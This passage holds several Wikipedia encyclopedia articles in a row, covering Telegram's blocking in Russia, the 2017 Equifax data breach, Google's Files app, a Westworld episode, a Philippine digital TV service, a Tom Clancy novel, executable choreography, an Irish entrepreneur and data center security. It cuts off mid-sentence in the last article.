Yarovaya law by Telegram. In October 2017, a judgment was delivered in favor of the FSB, imposing a fine on Telegram of 800 thousand rubles. The reason cited was the lack of encryption keys for 6 persons accused of terrorism. According to a statement issued by one of the founders of Telegram, Pavel Durov, even if the request of the FSB was solely intended to help in capturing six terrorists, Telegram could not comply, as the mobile numbers that the FSB was concerned with either never had accounts in Telegram, or their accounts were deleted due to inactivity. At the same time, the FSB had demanded the creation of a technology that would enable them to access the correspondence of any users. According to Pavel Durov, the FSB's requirements were not feasible: Pavel Durov put out a call on October 16, 2017, for lawyers who are willing to represent Telegram in a court to appeal the decision. Two days later Durov said that he received 200 proposals from lawyers, and chosen Inter-regional Association of Human Rights Organizations "Agora" to represent Telegram in the court battles. Russia's Supreme Court rejected Telegram's lawsuit to FSB on March 20, 2018. After the court ruling, the Russian watchdog Roskomnadzor said the messaging service had 15 days to provide the required information to the country's security agencies. The FSB defended its position, saying that providing the FSB with the technical ability to decode messages does not annul legal procedures such as obtaining court rules in order to perlustrate specific messages. On April 13, Moscow's Tagansky district court ruled to block access to Telegram in Russia over its failure to provide encryption keys to the FSB. Protest actions On April 22, 2018, "an action in support of free Internet" was held in multiple cities around Russia, timed to the seventh day of Telegram's being blocked. Residents of Russia launched paper airplanes (the symbol of Telegram) from the roofs of various buildings. The protest was planned on Telegram on the morning of April 22. Pavel Durov, one of the founders of Telegram, supported the action, but asked that the participants gather up the paper airplanes within an hour after the launch. On April 30, 2018, in the center of Moscow, an action was held in support of Telegram in Russia as a result of its blocking. More than 12,000 people participated. See also Internet censorship Blocking Wikipedia in Russia Telegram in Iran References April 2018 events in Russia Internet censorship in Russia Telegram (software)
57542624
https://en.wikipedia.org/wiki/2017%20Equifax%20data%20breach
2017 Equifax data breach
The Equifax data breach occurred between May and July 2017 at the American credit bureau Equifax. Private records of 147.9 million Americans along with 15.2 million British citizens and about 19,000 Canadian citizens were compromised in the breach, making it one of the largest cybercrimes related to identity theft. In a settlement with the United States Federal Trade Commission, Equifax offered affected users settlement funds and free credit monitoring. In February 2020, the United States government indicted members of China's People's Liberation Army for hacking into Equifax and plundering sensitive data as part of a massive heist that also included stealing trade secrets, though the Chinese Communist Party denied these claims. Data breach The data breach into Equifax was principally through a third-party software exploit that had been patched, and Equifax failed to update their servers with it. Equifax had been using the open-source Apache Struts as its website framework for systems handling credit disputes from consumers. A key security patch for Apache Struts was released on March 7, 2017 after a security exploit was found and all users of the framework were urged to update immediately. Security experts found an unknown hacking group trying to find websites that had failed to update Struts as early as March 10, 2017 as to find a system to exploit. As determined through postmortem analysis, the breach at Equifax started on May 12, 2017 when Equifax had yet to update its credit dispute website with the new version of Struts. The hackers used the exploit to gain access to internal servers on Equifax' corporate network. The information first pulled by the hackers included internal credentials for Equifax employees, which then allowed the hackers to search the credit monitoring databases under the guise of an authorized user. Using encryption to further mask their searches, the hackers performed more than 9000 scans of the databases, extracted information into small temporary archives that were then transferred off the Equifax servers to avoid detection and removed the temporary archives once complete. The activities went on for 76 days until July 29, 2017 when Equifax discovered the breach and subsequently, by July 30, 2017, shut off the exploit. At least 34 servers in twenty different countries were used at different points during the breach, making tracking the perpetrators difficult. While the failure to update Struts was a key failure, analysis of the breach found further faults in Equifax' system that made it easy for the breach to occur, including the insecure network design which lacked sufficient segmentation, potentially inadequate encryption of personally identifiable information (PII), and ineffective breach detection mechanisms. Information accessed in the breach included first and last names, Social Security numbers, birth dates, addresses and, in some instances, driver's license numbers for an estimated 143 million Americans, based on Equifax' analysis. Information on an estimated range of under 400,000 up to 44 million British residents as well as 8,000 Canadian residents were also compromised. An additional 11,670 Canadians were affected as well, later revealed by Equifax. Credit card numbers for approximately 209,000 U.S. consumers, and certain dispute documents with personally identifiable information for approximately 182,000 U.S. consumers were also accessed. Since the initial disclosure in September 2017, Equifax expanded the number of records they discovered were accessed. In both October 2017 and March 2018, Equifax reported that an additional 2.5 and 2.4 million American consumer records were accessed, respectively, bringing the total to 147.9 million. Equifax narrowed its estimate for UK consumers affected by the breach to 15.2 million in October 2017, of which 693,665 had sensitive personal data disclosed. Equifax also estimated that the number of drivers' licenses breached in the attack to be 10-11 million. Security experts expected that the lucrative private data from the breach would be turned around and sold on black markets and the dark web, though as of May 2021, there has been no sign of any sale of this data. Because the data did not immediately show up in the first 17 months following the breach, security experts theorized that either the hackers behind the breach were waiting for a significant amount of time before selling the information since it would be too "hot" to sell that close to the breach, or that a nation-state was behind the breach and planning on using the data in a non-financial manner such as for espionage. Disclosure and short-term responses On September 7, 2017, Equifax disclosed the breach and its scope: affecting over 140 million Americans. VentureBeat called the exposure of data on 140+ million customers "one of the biggest data breaches in history." Equifax shares dropped 13% in early trading the day after the breach was made public. Numerous media outlets advised consumers to request a credit freeze to reduce the impact of the breach. On September 10, 2017, three days after Equifax revealed the breach, Congressman Barry Loudermilk (R-GA), who had been given two thousand dollars in campaign funding from Equifax, introduced a bill to the U.S. House of Representatives that would reduce consumer protections in relation to the nation's credit bureaus, including capping potential damages in a class action suit to $500,000 regardless of class size or amount of loss. The bill would also eliminate all punitive damages. Following criticism by consumer advocates, Loudermilk agreed to delay consideration of the bill "pending a full and complete investigation into the Equifax breach". On September 15, Equifax released a statement announcing the immediate departures and replacements of its Chief Information Officer and Chief Security Officer. The statement included bullet-point details of the intrusion, its potential consequences for consumers, and the company's response. The company said it had hired cybersecurity firm Mandiant on August 2 to investigate the intrusion internally. The statement did not specify when U.S. government authorities were notified of the breach, although it did assert "the company continues to work closely with the FBI in its investigation". On September 28, new Equifax CEO Paulino do Rego Barros Jr. responded to criticism of Equifax by promising that the company would, from early 2018, allow "all consumers the option of controlling access to their personal credit data", and that this service would be "offered free, for life". On October 26, Equifax appointed technology executive Scott A. McGregor to its board of directors. In announcing the change, the board's chairman noted McGregor's "extensive data security, cybersecurity, information technology and risk management experience". The Wall Street Journal reported that he joined the board's technology committee, which has duties that include oversight of cybersecurity. Litigation Numerous lawsuits were filed against Equifax in the days after the disclosure of the breach. In one suit the law firm Geragos & Geragos has indicated they would seek up to $70 billion in damages, which would make it the largest class-action suit in U.S. history. Since October 2017, hundreds of consumers have sued Equifax for the data breach, some winning small claims cases in excess of $9,000, including actual damages, future damages, anxiety, monitoring fees and punitive damages. In September 2017, Richard Cordray, then director of the Consumer Financial Protection Bureau (CFPB), authorized an investigation into the data breach on behalf of affected consumers. However, in November 2017, Mick Mulvaney, President Donald Trump's budget chief, who was appointed by Trump to replace Cordray, was reported by Reuters to have "pulled back" on the probe, along with shelving Cordray's plans for on-the-ground tests of how Equifax protects data. The CFPB also rebuffed bank regulators at the Federal Reserve Bank, Federal Deposit Insurance Corporation and Office of the Comptroller of the Currency who offered to assist with on-site exams of credit bureaus. Senator Elizabeth Warren, who released a report on the Equifax breach in February 2018, criticized Mulvaney's actions, stating: "We're unveiling this report while Mick Mulvaney is killing the consumer agency's probe into the Equifax breach. Mick Mulvaney shoots another middle finger at consumers." On July 22, 2019, Equifax agreed to a settlement with the Federal Trade Commission (FTC), CFPB, 48 U.S. states, Washington, D.C., and Puerto Rico to alleviate damages to affected individuals and make organizational changes to avoid similar breaches in the future. The total cost of the settlement included $300 million to a fund for victim compensation, $175 million to the states and territories in the agreement, and $100 million to the CFPB in fines. In July 2019, the FTC published information on how affected individuals could file a claim against the victim compensation fund using the website EquifaxBreachSettlement.com. Perpetrators The United States Department of Justice announced on February 10, 2020 that they had indicted four members of China's military on nine charges related to the hack, though there has been no additional evidence that China has since used the data from the hack. The Chinese government denied that the four accused had any involvement with the hack. Criticism Following the announcement of the May–July 2017 breach, Equifax's actions received widespread criticism. Equifax did not immediately disclose whether PINs and other sensitive information were compromised, nor did it explain the delay between its discovery of the breach in July and its public announcement in early September. Equifax stated that the delay was due to the time needed to determine the scope of the intrusion and the large amount of personal data involved. It was also revealed that three Equifax executives sold almost $1.8 million of their personal holdings of company shares days after Equifax discovered the breach but more than a month before the breach was made public. The company said the executives, including the chief financial officer John Gamble, "had no knowledge that an intrusion had occurred at the time they sold their shares". On September 18, Bloomberg reported that the U.S. Justice Department had opened an investigation to determine whether or not insider trading laws had been violated. "As Bloomberg notes, these transactions were not pre-scheduled trades and they took place on August 2, three days after the company learned of the hack". When publicly revealing the intrusion to its systems, Equifax offered a website (https://www.equifaxsecurity2017.com) for consumers to learn whether they were victims of the breach. Security experts quickly noted that the website had many traits in common with a phishing website: it was not hosted on a domain registered to Equifax, it had a flawed TLS implementation, and it ran on WordPress which is not generally considered suitable for high-security applications. These issues led Open DNS to classify it as a phishing site and block access. Moreover, members of the public wanting to use the Equifax website to learn if their data had been compromised had to provide a last name and six digits of their social security number. The website set up to check whether a person's personal data had been breached (trustedidpremier.com) was determined by security experts and others to return apparently random results instead of accurate information. As with https://www.equifaxsecurity2017.com, this website, too, was registered and constructed like a phishing website, and it was flagged as such by several web browsers. The Trusted ID Premier website contained terms of use, dated September 6, 2017 (the day before Equifax announced the security breach) which included an arbitration clause with a class action waiver. Attorneys said that the arbitration clause was ambiguous and that it could require consumers who accepted it to arbitrate claims related to the cybersecurity incident. According to Polly Mosendz and Shahien Nasiripour, "some fear[ed] that simply using an Equifax website to check whether their information was compromised bound them to arbitration". The equifax.com website has separate terms of use with an arbitration clause and class action waiver, but, according to Brian Fung of The Washington Post, "it's unclear if that applies to the credit monitoring program". New York Attorney General Eric Schneiderman demanded that Equifax remove the arbitration clause. Responding to arbitration-related concerns, on September 8, Equifax issued a statement stating that "in response to consumer inquiries, we have made it clear that the arbitration clause and class action waiver included in the Equifax and TrustedID Premier terms of use does not apply to this cybersecurity incident". Joel Winston, a data protection lawyer, argued that the announcement disclaiming the arbitration clause "means nothing" because the terms of use state that they are the "entire agreement" between the parties. The arbitration clause was later removed from equifaxsecurity2017.com, and the equifax.com terms of use were amended on September 12 to state that they do not apply to www.equifaxsecurity2017.com, www.trustedidpremier.com, or www.trustedid.com and to exclude claims arising from those sites or the security breach from arbitration. Responding to continuing public outrage, Equifax announced on September 12 that they "are waiving all Security Freeze fees for the next 30 days". Equifax has been criticized by security experts for registering a new domain name for the site name instead of using a subdomain of equifax.com. On September 20, it was reported that Equifax had been mistakenly linking to an unofficial "fake" web site instead of their own breach notification site in at least eight separate tweets, unwittingly helping to direct a reported 200,000 hits to the imitation site. A software engineer named Nick Sweeting created the unauthorized Equifax web site to demonstrate how the official site could easily be confused with a phishing site. Sweeting's site was upfront to visitors that it was not official, however, telling visitors who had entered sensitive information that "you just got bamboozled! this isnt a secure site! Tweet to @equifax to get them to change it to equifax.com before thousands of people loose their info to phishing sites!" Equifax apologized for the "confusion" and deleted the tweets linking to this site. See also Chinese cyberwarfare Chinese espionage in the United States References Data breaches in the United States 2017 controversies in the United States May 2017 crimes in the United States June 2017 crimes in the United States July 2017 crimes in the United States September 2017 events in the United States Hacking in the 2010s Identity theft incidents Internet privacy
57554020
https://en.wikipedia.org/wiki/Files%20%28Google%29
Files (Google)
Files (formerly known as Files Go) is a file management app developed by Google for file browsing, media consumption, storage clean-up and offline file transfer. It was released by Google on December 5, 2017 with a custom version for China being released on May 30, 2018. Features The app is currently only available on the Android operating system, and includes three tabs: Clean, Browse, and Share. On Google Pixel devices, the Share tab is found by clicking the menu button. Clean mode This page identifies unused apps, large files, and duplicate files which users may no longer need. It can also notify the user when the storage is almost full. There is also a "Trash" feature, in which contents will be permanently deleted after 30 days. Browse mode This page displays recently accessed files on the top by folder, and multiple categories on the bottom such as: "Downloads", "Images", "Videos", "Audio", "Documents & Other", and "Apps". It also includes a "Favorites" folder, a "Safe Folder" which protects files using a Pattern or a PIN, as well as two buttons leading to "Internal storage" and "Other storage". Alongside that, the app also has a media player/image viewer, and the ability to backup files to Google Drive. Share mode Files uses peer-to-peer sharing (powered by Nearby Share) to send and receive files or apps. It also uses encryption to keep shared contents private. References External links File managers File transfer software Google software Android (operating system) software
57554906
https://en.wikipedia.org/wiki/Les%20%C3%89corch%C3%A9s
Les Écorchés
"Les Écorchés" is the seventh episode in the second season of the HBO science fiction western thriller television series Westworld. The episode aired on June 3, 2018. It was written by Jordan Goldberg and Ron Fitzgerald and directed by Nicole Kassell. This episode marks the final appearances of Talulah Riley (Angela). Plot summary In the present, Strand and Charlotte discover Bernard is a host. Charlotte interrogates Bernard about Dolores' attack on the Mesa. In flashbacks, Bernard explores the virtual space within the Cradle, where he encounters Ford. Ford reveals that the control unit Bernard retrieved from the bunker contained a copy of Ford's persona and memories. As Ford and Bernard talk, Bernard realizes the purpose of the Delos parks has been to create copies of the guests' minds. Delos successfully attained fidelity but had been unable to put these into hosts as the hosts degenerate quickly, as happened to James Delos. Furthermore, Bernard learns that he was tested the same way by Dolores, who knew Arnold best, before Ford accepted him as an "original work" and released him into the world. Lastly, Ford tells Bernard that he will not be able to survive unless he loses his free will. He forces Bernard out of the Cradle and Elsie reports that the disruption of the system has cleared. Bernard is instructed by a vision of Ford to follow his orders; in taking Bernard's free will, Ford has imprinted himself on Bernard's control unit. Meanwhile, Angela makes her way to the Cradle and destroys it, killing herself in the process. The Horde fight Coughlin's mercenaries as Dolores and Teddy search for Peter. They find him with Charlotte, who orders technicians to copy the data within Peter. She is forced to reveal to Ashley that the data includes an encryption key for "the Project" as Dolores captures them. She remarks that the Cradle's destruction sets the hosts free. Charlotte and Stubbs flee when Coughlin and his team arrive. Teddy fights them and beats Coughlin to death. Peter recovers his memories long enough to tell Dolores that he knows he is dying and says goodbye. Dolores removes his control unit. In the park, Akecheta and the Ghost Nation warriors chase Maeve and her daughter to a homestead, while a raiding party shepherds William and his gang there. William finds Maeve and mistakes her for another trick by Ford; she injures him, then turns his men against him. Lawrence stops her until Maeve awakens him to his past memories. He critically wounds William but is prevented from killing him by the arrival of Delos forces called by Lee. They kill Lawrence and wound Maeve, whom Lee instructs them to save. Maeve is powerless to stop Akecheta from capturing her daughter. Ford leads Bernard to the control center where he witnesses the remains of the Delos forces being wiped out by the Horde. Bernard turns off all of the security systems, allowing Dolores full control. Dolores finds Maeve at the exit and tells her that the humans are using her daughter to control her. Maeve refuses her offer of a mercy killing and warns her that her manipulation of Teddy makes her no better than the humans. Returning to the present, Charlotte, Strand and Stubbs find Bernard having difficulty separating his real memories from those implanted. He is able to tell that Peter's control unit is in the Valley Beyond. Production The title of the episode is a reference to Écorché, a style of artwork that depicts the human body without skin. This allows the artist to develop an understanding of the musculoskeletal system and create more realistic artwork. Reception "Les Écorchés" was watched by 1.39 million viewers on its initial viewing, and received a 0.5 18–49 rating, marking an improvement from the previous week which had a series low viewership of 1.11 million. The episode received positive reviews from critics. At Rotten Tomatoes, the episode has an 88% approval rating with an average score of 8.74/10, from 32 reviews. The site's critical consensus reads: "Bloody, philosophical, and action-packed 'Les Écorchés' marks the return of a major character -- though the shows' unruly timelines continue to render its compelling ensemble somewhat hollow." Notes References External links at HBO.com 2018 American television episodes Escorches, Les
57626195
https://en.wikipedia.org/wiki/Easy%20TV%20%28Philippines%29
Easy TV (Philippines)
Easy TV Home was a ISDB-T encrypted digital terrestrial television product and service operated by Solar Digital Media Holdings, Inc., a subsidiary of Solar Entertainment Corporation. Originally as a mobile TV dongle service, it later distributed digital set-top boxes, as well as freemium digital TV channels. Until its discontinuation on September 30, 2019 due to poor sales, Easy TV was receivable in selected areas in Metro Manila and parts of nearby provinces. Channel lineup All channels provided by Solar (with the exception of ETC and Shop TV, which are free-to-air on all digital platforms) were encrypted and scrambled using ABV encryption system, thus required activation via hotline or through their website for those channels to be unscrambled. In addition, all non-encrypted digital terrestrial TV channels broadcast within the area of the household are also carried. A recent notice on the website states that only free-to-air channels can be viewed on set-top boxes after September 30, 2019 with EasyTV ceasing commercial operations due to low sales. See also ABS-CBN TV Plus (defunct) GMA Affordabox Sulit TV References External links Official website (archived) Solar Entertainment Corporation Digital television in the Philippines Products introduced in 2018 Products and services discontinued in 2019 2018 establishments in the Philippines 2019 disestablishments in the Philippines
57639930
https://en.wikipedia.org/wiki/Point%20of%20Contact%20%28novel%29
Point of Contact (novel)
Point of Contact (stylized as Tom Clancy Point of Contact, Tom Clancy: Point of Contact or Tom Clancy's Point of Contact in the United Kingdom) is a techno-thriller novel, written by Mike Maden and released on June 13, 2017. Set in the Tom Clancy universe, the novel depicts Jack Ryan Jr. as he helps avert a North Korean plot to crash the Asian stock market, along with his Hendley Associates colleague Paul Brown, in Singapore. Point of Contact marks Maden’s debut as the sole author of the Jack Ryan Jr. novels, succeeding Grant Blackwood. It debuted at number 3 on the New York Times bestseller list. Plot summary American defense contractor Marin Aerospace is looking to acquire Dalfan Technologies, a Singapore-based company. However, former US senator Weston Rhodes, who is on the Marin Aerospace board of directors, is blackmailed by former Bulgarian intelligence officer and old enemy Tervel Zvezdev, who has a plan to crash the Asian stock market by driving Dalfan stock points down and then gain profit for themselves. After giving in to the plot, Rhodes is given a flash drive with a computer virus that will be installed into the Dalfan computer server in Singapore, unaware that the North Koreans had made the virus and, through General Administrative Services Directorate Deputy Ri Kwan Ju, enlisted Zvezdev's help. To carry out this plan, Rhodes asks his former Senate colleague and Hendley Associates head Gerry Hendley to facilitate a week-long, third party audit into Dalfan Technologies on behalf of Marin Aerospace to make sure that there are no problems among both parties leading up to the impending merger. He personally selects forensic accountant Paul Brown and financial analyst Jack Ryan, Jr. to oversee the audit. Having known Brown as a colleague from the Central Intelligence Agency years ago, he then secretly entrusts the accountant with planting the flash drive in the Dalfan computer network, under the pretense of him being assigned by the CIA to find out whether China had inserted malware into the system. Upon arriving in Singapore, Ryan and Brown are met by the Fairchild family, who own Dalfan Technologies: Dr. Gordon Fairchild and his two children, Lian and Yong. Lian Fairchild, who is chief of security for the company, personally assists them in touring the country as well as the Dalfan headquarters as part of the audit. Ryan is introduced to the company’s technological advances in the fields of virtual reality, quantum cryptography, and especially digital surveillance in the form of Dalfan’s flagship program, the Steady Stare drone, which “time travels” through 24/7 video monitoring of Singapore in order to pinpoint the circumstances behind a particular crime. On the other hand, Brown checks through the company’s ledgers for any signs of fraud. Meanwhile, he finds Rhodes’s job extremely difficult due to the high security of the Dalfan building, and eventually seeks the aid of Hendley Associates’s head of IT Gavin Biery to write a piece of software that will allow the CIA flash drive to be installed into a Dalfan computer by “snatching” the company server’s encryption code and inserting it into the mentioned drive without incident, making up a story of Ryan having an affair with a Chinese spy (implied to be Lian) to urgently do so. Otherwise, everything goes smoothly with the audit, until Ryan and Brown stumble upon a suspicious pattern of transactions to a Shanghai importer, where Dalfan has been selling disposable mobile phones to at a reduced rate. With the aid of the Steady Stare drone, Ryan checks out the Dalfan warehouse where the mobile phones are being kept, only to be aggressively stopped and turned away by the guards. Later convinced by Brown’s discovery of the mysterious deletion of the file containing the transactions, he sneaks in back there later that night, but he finds nothing but DVD players. He is then attacked by the stationed Chinese guards, but manages to kill them. He then deduces that the place has already been cleaned up and that he was ambushed. Unbeknownst to him, Yong Fairchild, who is Dalfan’s chief financial officer, and his girlfriend Meili, who is a Chinese spy, orchestrated the attempted murder in order to silence him. The next day, Brown is about to install the flash drive when he becomes convinced that it is embedded with a computer virus after examining its lines of code. He then disappears with the flash drive in order to evade possible capture from assassins who may be hunting for him now that he did not install the virus. Ryan then looks for him, enlisting Biery’s help and finding out about his secret correspondence with Brown in the process. He later finds Brown in a brothel just as a pair of assassins sent by Zvezdev arrive to kill him. After killing the two hitmen, Ryan is then told by Brown about the flash drive. They return to their guesthouse, only to find Lian waiting for them. She tells Ryan that her brother Yong and his girlfriend had already fled to China in order to escape the incoming tropical storm that is set to hit Singapore. However, they find themselves attacked, and Brown is then abducted. Ryan pinpoints the Dalfan headquarters as the location where Brown is being held and where his abductors will force him to install the flash drive. He and Lian proceed there, kill the men holding Brown, and then free him. He had given up the password to the drive after being tortured, and as a result, the virus has been uploaded into the network and is set to create chaos when the stock markets open the next day. Because cell service is down in Singapore because of the tropical storm, deterring any contact to the U.S. embassy, Ryan, Brown, and Lian decide to drive all the way to the neighboring country of Malaysia in order to try to stop the virus. Upon arriving in Malaysia in the middle of the heavy rains, the trio are attacked by a group of North Koreans sent by Deputy Ri to eliminate them. Brown sacrifices himself by staying behind and dispatching them, leaving Ryan and Lian to escape. He is then killed in the ensuing gunfight. Days later, Rhodes is arrested for conspiring to crash the stock market. Brown is given a proper burial in his hometown in the state of Iowa, where Ryan as well as his father, President Ryan, and members of the intelligence community attend. A flashback establishes that Brown was honored in the CIA for saving Rhodes from an ambush by Zvezdev in Sofia, Bulgaria in 1985, where he had seemingly killed the Bulgarian intelligence officer. Meanwhile, Zvezdev was implied to have been killed by the North Koreans for failing to do his job, and his remains were then stuffed in a kimchi jar. Characters United States government Jack Ryan: President of the United States Scott Adler: Secretary of state Mary Pat Foley: Director of national intelligence Robert Burgess: Secretary of defense Jay Canfield: Director of the Central Intelligence Agency Arnold Van Damm: President Ryan's chief of staff The Campus Gerry Hendley: Director of The Campus and Hendley Associates John Clark: Director of operations Domingo "Ding" Chavez: Senior operations officer Dominic "Dom" Caruso: Operations officer Jack Ryan, Jr.: Operations officer / senior analyst Gavin Biery: Director of information technology Adara Sherman: Operations officer Bartosz "Midas" Jankowski: Operations officer Other characters Paul Brown: Forensic accountant, Hendley Associates Weston Rhodes: Ex-U.S. senator; board member, Marin Aerospace Dr. Gordon Fairchild: Chief executive officer, Dalfan Technologies Lian Fairchild: Head of security, Dalfan Technologies (Gordon Fairchild's daughter) Yong Fairchild: Chief financial officer, Dalfan Technologies (Gordon Fairchild's son) Choi Ha-guk: Chairman, Democratic People's Republic of Korea (DPRK) Ri Kwan-ju: Deputy, General Administrative Services Directorate, DPRK Tervel Zvezdev: Former member, Bulgarian Committee for State Security (CSS) Development On February 20, 2017, The Real Book Spy announced that principal authors in the Tom Clancy universe, Mark Greaney and Grant Blackwood are leaving the franchise. Greaney was then replaced by Marc Cameron for the fall-release Jack Ryan novels, while Blackwood was replaced by Maden for the summer-release Jack Ryan Jr. novels. Speaking of Maden's inclusion into the franchise, long-time Tom Clancy editor Tom Colgan stated: “I had read and loved Mike Maden’s Troy Pearce series, so he was the first person I thought of for the Jack Jr. books and I have to say that it’s been a blast working with him on Tom Clancy Point of Contact.” Prior to Point of Contact, Maden was well-known for the Drone series of techno thrillers, and is a fan of Clancy from reading The Hunt for Red October in graduate school. He elaborated that "Tom Clancy’s genius was to bring current technology into stories in a powerful and entertaining way, but he also created some of the most compelling characters in the genre—a genre he essentially invented. No one can ever replace him or even imitate him." Unlike Clancy, who goes to countries to research for his novels, Maden relied on the Internet, or "interwebs", for information into the genuine technologies featured in Point of Contact. Reception Commercial Point of Contact debuted at number three on the Combined Print and E-Book Fiction and Hardcover Fiction categories of the New York Times bestseller list for the week of July 2, 2017, making it Maden's first and highest charting release in the list. In addition, it debuted at number four on the USA Today Best-Selling Books list for the week of June 22, 2017. Critical The book received generally positive reviews. Publishers Weekly praised it as a "taut, exciting thriller" and that "Clancy fans can rest assured that the state of the franchise is strong." In a featured review, thriller novel reviewer The Real Book Spy said that "After three novels from Grant Blackwood, Mike Maden takes over the Jack Ryan Junior franchise and mixes nail-biting suspense with hard-hitting action to deliver a blockbuster hit that Clancy fans will love." References 2017 American novels American thriller novels Techno-thriller novels Ryanverse Novels set in Singapore G. P. Putnam's Sons books
57678706
https://en.wikipedia.org/wiki/Executable%20choreography
Executable choreography
Executable choreography represents a decentralized form of service composition, involving the cooperation of several individual entities. It is an improved form of service choreography. Executable choreographies can be intuitively seen as arbitrary complex workflows that get executed in systems belonging to multiple organisations or authorities. Executable choreographies are actual code created to encode system behavior from a global point of view. The behavior of main entities in a system is given in a single program. Choreographies enhance the quality of software, as they behave like executable  blueprints of how communicating systems should behave and offer a concise view of the message flows enacted by a system. Executable vs. non-executable choreography In almost all applications the business logic must be separated into different services. The orchestration represents the way that these services are organized and composed. The resulting service can be integrated hierarchically into another composition. Service choreography is a global description of the participating services, which is defined by exchange of messages, rules of interaction and agreements between two or more endpoints. Choreography employs a decentralized approach for service composition. In industry, the concept of choreography is generally considered to be non-executable. Standards, such as those proposed by the Web Services Choreography Description Language, present the choreography as a more formal model to describe contracts between autonomous entities (generally distinct organizations) participating in a composition services analyzed globally. From this perspective, the composition itself must be implemented centrally through the different orchestration mechanisms made available by companies: naive code composition or the use of specific orchestration languages and engines such as BPEL (Business Process Execution Language), rule engines, etc. In the area of academic research, the concept of executable choreography is proposed as a method of no longer having the contractual part and the actual part of code as two different artifacts that can be non-synchronized or require subjective interpretations. Examples are "An Executable Calculus for Service Choreography" or "An executable choreography framework for dynamic service-oriented architectures". Few of these approaches have also had a practical impact, often at the level of articles or, at the very least, research projects. The real breakthrough of the blockchain in recent years has brought even more to the attention of the academic community and industry, the concept of "smart contract", which can be seen as a particular form of executable choreography. Executable choreographies types Verifiable choreographies Executable choreographies are a more general concept and are not necessarily verifiable choreographies if they do not use the idea of a site regarded as a security context for code execution. As examples of approaches to programming using executable choreographies, we could list the European project CHOReOS, the Chor programming language, the web service modeling in the "Choreographing Web Services" of some aspects related to the composition of web services using pi-calculus. The verifiable term was introduced to highlight the possibility of verifying swarm communication. The explicit presence of the execution location idea leads to the possibility of developing verification algorithms as can be seen in the article "Levels of privacy for e-Health systems in the cloud era". Encrypted choreographies Encrypted cryptography supposes that, in addition to verification, they offer higher-level solutions for advanced cryptographic methods without the need for programmers to become cryptography specialists. Distributed applications could be built from subsystems that allow identification or verification of architectural points that expose secret data. For example, ideally, a programming system that uses encrypted choreographs guarantees, or at least helps, minimize situations where a person (legally licensed or hacker) holds both encrypted private data and encryption keys related to the same resources. In this way, the administrators or programmers of these subsystems have fewer possibilities to perform internal attacks on privacy (the level with frequent attacks). Even if some applications can not use this approach, encrypted choreographies can minimize the security risks caused by the people inside who administer or program these systems. Thus, the number of points with discreet access to data (ideally never) is formally ensured. This form of choreography is useful to allow companies to secure by code the application of the legislation or security rules assumed. The implementation of encrypted choreographies implies, for example, the existence of storage systems using cryptographic techniques with practical implementation of homomorphic encryption, such as the CryptDB implementation from MIT. A method that can also be called a "storage, division and anonymization method" with the help of encrypted choreographies, can lead to the ideal of having total "sovereignty" (within the limits of the law) on private data was published in the article "Private Data System enabling self-sovereign storage managed by executable choreographies". This paper presents how choreographies anonymize and divide data in a way that ensures that data can not be copied by a single administrator or hacker that controls only one of the participating nodes. The implemented mechanisms can also include interfaces that are easy to use by programmers for advanced cryptographic methods. Serverless choreographies Serverless computing is a cloud computing model in which the cloud provider dynamically manages the allocation of computing resources. Serverless choreographies involve automating launching methods using virtualization and automation techniques. The implementation of this advanced type of choreography requires the development of new business models to facilitate cloud-based application hosting without any friction related to payment, installation, etc. For example, the Tor concept provides an example for such serverless systems. The best known example is Amazon Lambda which has great commercial success allowing programmers to ignore installation details and facilitate dynamic scalability of systems. Blockchains can be considered examples of serverless databases. Serverless choreographies assume that cloud execution and storage is done using encrypted choreographies. Using this form of choreography, hosting companies or individuals managing physical and logical hosting infrastructure will not be able to influence hosted installation or applications. Serverless choreographies present the opportunity to develop distributed, decentralized systems and the potential to formally secure advanced privacy properties. References Service-oriented (business computing) Web service specifications
57779393
https://en.wikipedia.org/wiki/Shane%20Curran%20%28entrepreneur%29
Shane Curran (entrepreneur)
Shane Curran (born 1999/2000) is an Irish entrepreneur. He is the founder of Evervault, a technology company based in Dublin. He won the 53rd BT Young Scientist and Technology Exhibition in 2017 at the age of sixteen for his project entitled: “qCrypt: The quantum-secure, encrypted, data storage platform with multijurisdictional quorum sharing technology”, which provided a platform for long-term, secure data storage. In January 2018, Curran was named in the Forbes 30 Under 30 list. Career BT Young Scientist Curran entered the 53rd BT Young Scientist and Technology Exhibition with his project entitled "qCrypt: The quantum-secure, encrypted, data storage platform with multijurisdictional quorum sharing technology". The project consisted of advancements in the field of post-quantum cryptography. Quantum computers are expected to render existing cryptography schemes obsolete once they come into existence. Curran's research investigated different ways to approach constructing a solution to the issue. On 13 January 2017 he was announced the BT Young Scientist and Technologist of the Year 2017 by Minister for Education and Skills, Mr. Richard Bruton, T.D and Shay Walsh, CEO, BT Ireland. He went on to represent Ireland at the 29th European Union Contest for Young Scientists which took place in Tallinn, Estonia in September 2017. Evervault In 2019, Curran founded Evervault, which builds encryption infrastructure for developers. The company is headquartered in Dublin, Ireland and has received backing from Sequoia Capital and Kleiner Perkins. References External links Personal Website Young Scientist and Technology Exhibition 2000 births 21st-century Irish people Living people Irish computer scientists Businesspeople from Dublin (city) Forbes 30 Under 30 recipients
57793246
https://en.wikipedia.org/wiki/Data%20center%20security
Data center security
Data center security is the set of policies, precautions and practices adopted at a data center to avoid unauthorized access and manipulation of its resources. The data center houses the enterprise applications and data, hence why providing a proper security system is critical. Denial of service (DoS), theft of confidential information, data alteration, and data loss are some of the common security problems afflicting data center environments. Overview According to the Cost of a Data Breach Survey, in which 49 U.S. companies in 14 different industry sectors participated, they noticed that: 39% of companies say negligence was the primary cause of data breaches Malicious or criminal attacks account for 37 percent of total breaches. The average cost of a breach is $5.5 million. The need for a secure data center Physical security is needed to protect the value of the hardware therein. Data protection The cost of a breach of security can have severe consequences on both the company managing the data center and on the customers whose data are copied. The 2012 breach at Global Payments, a processing vendor for Visa, where 1.5 million credit card numbers were stolen, highlights the risks of storing and managing valuable and confidential data. As a result, Global Payments' partnership with Visa was terminated; it was estimated that they lost over $100 million. Insider attacks Defenses against exploitable software vulnerabilities are often built on the assumption that "insiders" can be trusted. Studies show that internal attacks tend to be more damaging because of the variety and amount of information available inside organizations. Vulnerabilities and common attacks The quantity of data stored in data centers has increased, partly due to the concentrations created by cloud-computing Threats Some of the most common threats to data centers: DoS (Denial of Service) Data theft or alteration Unauthorized use of computing resources Identity theft Vulnerabilities Common vulnerabilities include: Implementation: Software design and protocol flaws, coding errors, and incomplete testing Configuration: Use of defaults, elements inappropriately configured Exploitation of out-of-date software Many "worm" attacks on data centers exploited well-known 